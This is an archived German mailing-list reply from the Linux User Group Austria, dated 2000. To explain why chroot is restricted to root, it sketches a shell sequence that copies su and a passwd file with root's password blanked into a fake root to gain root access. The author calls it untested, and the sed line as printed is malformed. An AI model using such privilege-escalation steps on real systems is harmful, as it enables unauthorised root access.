[LUGA] Mit freundlicher Unterstützung von:
init.at

Mail Thread Index


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [luga] chroot Frage



on Sat, 17 Jun 2000 Philipp Gühring wrote:

>Ich seh nämlich keinen Grund dafür, chroot normalen Usern zu verbieten.

Ich schon :-))

$ mkdir newroot
$ mkdir newroot/bin
$ mkdir newroot/etc
$ ln /usr/bin/su newroot/bin/su
$ ln /bin/sh newroot/bin/sh
$ cp /etc/passwd newroot/etc/passwd
$ sed sed 's/root:.?*:/root::/' < newroot/passwd > newroot/passwd.ok
$ mv newroot/passwd.ok newroot/passwd
$ chroot newroot /bin/sh
$ su - root
# 

Hmm, :-))) das müsste eigentlich funktionieren (ich habe es aber nicht
ausprobiert) wenn Du auch noch alle sharedlibs für su, etc hinlinkst. Ich glaube
schon das sich bei solchen Restriktionen jemand was gedacht hat ;-))) und das
ist beim "einfachen" UNIX-Privilegien Modell auch noch nicht allzuschwehr,
anders ist es z.B. bei Betriebssystemen die komplexe Privilegienmodelle, ACLs,
Logical-Names etc. unterstützen wie zum Beispiel VMS da hat es Hacks in dieser
Art gegeben, weil es Teilweise schon so unübersichtlich wurde mit ca. 30
Privilegien, ACLs die auf Logical-Name Tables gesetzt werden können und so
weiter, daß es durchaus vorgekommen ist, daß mit einfachen Mitteln des
Betriebssystems die Security untergraben werden konnte, in VMS 4.2 (ca. 1985)
hat es sowas gegeben soweit ich mich daran erinnern kann.

Liebe Grüße

Alex
-- 
Email: Alexander Hausner <alh@teleweb.at>
NIC-HDL: AH194-RIPE
PGP Key ID: 1024/D272F9B5
PGP Key fingerprint: 45 CB 7A 6A 24 81 71 14  CE 11 27 53 36 63 AD 1C
PGP Public-Key: https://www.luga.or.at/pgppubkeys/D272F9B5.asc



powered by LINUX the choice of a gnu generation
linux user group austria;
Suche
Suche
Letzte Änderung:
webmaster@luga.at
September 2010